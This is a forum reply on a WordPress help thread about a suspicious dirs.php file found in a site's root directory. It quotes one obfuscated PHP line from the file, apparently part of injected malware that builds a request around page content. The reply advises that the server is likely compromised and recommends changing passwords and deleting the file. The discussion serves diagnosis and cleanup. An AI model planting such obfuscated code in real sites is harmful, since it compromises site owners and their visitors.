Quote:
Originally Posted by ravenazrael
what is the dirs.php file supposed to do?
i think that is one of the issues. it has crap like this one
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
|
Wordpress itself does not have any such file.
If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised.
I would suggest trying this, in this order:
- Change all your server-related user/passwords (ftp/cpanel, ssh)
- Change all your Wordpress passwords
- Delete the dirs.php file you found
If the script issue persists after all that, then your problem is as serious as
Google Expert's because infected files are hidden somewhere else in your server.